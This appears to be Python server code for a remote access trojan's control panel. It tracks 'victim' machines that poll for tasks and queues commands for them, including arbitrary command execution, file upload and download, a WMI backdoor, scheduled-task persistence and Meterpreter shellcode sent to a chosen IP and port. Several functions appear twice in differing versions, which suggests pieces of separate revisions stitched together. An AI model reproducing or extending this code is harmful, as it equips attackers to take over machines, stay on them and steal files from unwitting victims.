def check():
global server
data = unquote(request.get_data())
#TODO: add data format check
signature = md5(data + SECRET_KEY)
c = victim.victim()
p = payload.payload()
if not c.get(signature):
c = c.add(signature, request.remote_addr)
#添加初始任务
action.action().add(signature, signature, 'init', p.init(),
4) #add init task
return render_template_string(p.begin(),
server=server,
signature=signature)
def rat(signature):
global server
c = victim.victim()
a = action.action()
p = payload.payload()
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, signature):
return "error"
if not c.get(signature):
return 'error'
if request.method == 'GET':
cl = c.get(signature)
if not cl:
return "error"
c.heartbeat(signature)
ac = a.gettask(signature)
if ac:
exploit = ac['payload']
pid = ac['pid']
else:
exploit = 'aGJlYXQ='
pid = 'aGJlYXQ='
return render_template_string(exploit, server=server, signature=signature, pid=pid)
else:
pid = request.args.get('pid')
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, pid):
return "error"
data = request.get_data().encode('base64')
a.setfeedback(pid, data)
return ''
def getResult():
signature = request.values["signature"]
pid = request.values["pid"]
a = action.action()
data = a.get(pid)
if data and data.get("feedback"):
return data["feedback"].decode("base64")
else:
return make_response("error", 500)
def setCmd():
signature = request.form.get("signature").strip()
cmd = request.form.get("cmd").strip()
a = action.action()
p = payload.payload()
pid = md5(str(time.time()) + config.SECRET_KEY + signature + cmd + str(random.random()))
exploit = p.cmd(cmd)
a.add(pid, signature, "[cmd] " + cmd, exploit)
return pid
def setUpload():
signature = request.form.get("signature").strip()
filePath = request.form.get("filePath").strip()
a = action.action()
p = payload.payload()
pid = md5(str(time.time()) + config.SECRET_KEY + signature + filePath + str(random.random()))
exploit = p.upload(filePath)
a.add(pid, signature, "[upload] " + filePath, exploit)
return pid
def getResult():
signature = request.values['signature']
pid = request.values['pid']
a = action.action()
data = a.get(pid)
if data and data.get('feedback'):
return data['feedback'].decode('base64')
else:
return make_response('error', 500)
def setWmiBackdoor():
signature = request.form.get('signature').strip()
a = action.action()
p = payload.payload()
pid = md5(
str(time.time()) + config.SECRET_KEY + signature +
str(random.random()))
exploit = p.WmiBackdoor()
a.add(pid, signature, '[WmiBackdoor] launched', exploit)
return pid
def setExec():
signature = request.form.get('signature').strip()
cmd = request.form.get('cmd').strip()
a = action.action()
p = payload.payload()
pid = md5(
str(time.time()) + config.SECRET_KEY + signature + cmd +
str(random.random()))
exploit = p.run(cmd)
a.add(pid, signature, '[cmd] ' + cmd, exploit)
return pid
def setWindowsTasks():
signature = request.form.get('signature').strip()
t = request.form.get('time').strip()
a = action.action()
p = payload.payload()
pid = md5(
str(time.time()) + config.SECRET_KEY + signature + t +
str(random.random()))
exploit = p.WindowsTasks(t)
a.add(pid, signature, '[WindowsTasks] ' + t, exploit)
return pid
def setUpload():
signature = request.form.get('signature').strip()
filePath = request.form.get('filePath').strip()
a = action.action()
p = payload.payload()
pid = md5(
str(time.time()) + config.SECRET_KEY + signature + filePath +
str(random.random()))
exploit = p.upload(filePath)
a.add(pid, signature, '[upload] ' + filePath, exploit)
return pid
def setDownload():
signature = request.form.get("signature").strip()
originalname = request.form.get("filename").strip()
savePath = request.form.get("savePath").strip()
a = action.action()
p = payload.payload()
d = download.download()
filename = d.getbyname(originalname)["filename"]
originalname = d.getbyname(originalname)["originalname"]
savePath += "\\" + originalname
pid = md5(str(time.time()) + config.SECRET_KEY + signature + originalname + savePath + str(random.random()))
exploit = p.download(filename, savePath)
a.add(pid, signature, "[download] " + originalname + "(" + filename + ")" + " [savepath] " + savePath, exploit)
return pid
def plantMeterpreter0():
signature = request.form.get('signature').strip()
ip = request.form.get('ip').strip()
port = request.form.get('port').strip()
a = action.action()
p = payload.payload()
s = settings.settings()
s.set('LHOST', ip)
s.set('LPORT', port)
pid = md5(
str(time.time()) + config.SECRET_KEY + signature +
str(random.random()))
exploit = p.MeterpreterShellcode()
a.add(pid, signature, '[MeterpreterShellcode] %s:%s' % (ip, port), exploit)
return pid
def setDownload():
signature = request.form.get('signature').strip()
originalname = request.form.get('filename').strip()
savePath = request.form.get('savePath').strip()
a = action.action()
p = payload.payload()
d = download.download()
filename = d.getbyname(originalname)['filename']
pid = md5(
str(time.time()) + config.SECRET_KEY + signature + originalname +
savePath + str(random.random()))
exploit = p.download(filename, savePath)
a.add(
pid, signature, '[download] ' + originalname + '(' + filename + ')' +
' [savepath] ' + savePath, exploit)
return pid
def rat(signature):
global server
c = victim.victim()
a = action.action()
p = payload.payload()
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, signature):
return "error"
if not c.get(signature):
return 'error'
if request.method == 'GET':
c = victim.victim()
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, signature):
return 'error'
if not c.get(signature):
return 'error'
c.heartbeat(signature)
#TODO:添加全局任务
#查找未完成任务
ac = a.gettask(signature)
if ac and signature == ac['pid']:
a.setfeedback(signature, 'done')
exploit = ac['payload']
pid = ac['pid']
elif ac and ac['repeat'] < 3:
exploit = ac['payload']
pid = ac['pid']
a.addrepeat(pid)
else:
exploit = ''
pid = 'heartbeat'
return render_template_string(exploit,
server=server,
signature=signature,
pid=pid)
else:
pid = request.args.get('pid')
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, pid):
return "error"
data = request.get_data().encode('base64')
a.setfeedback(pid, data)
return ''
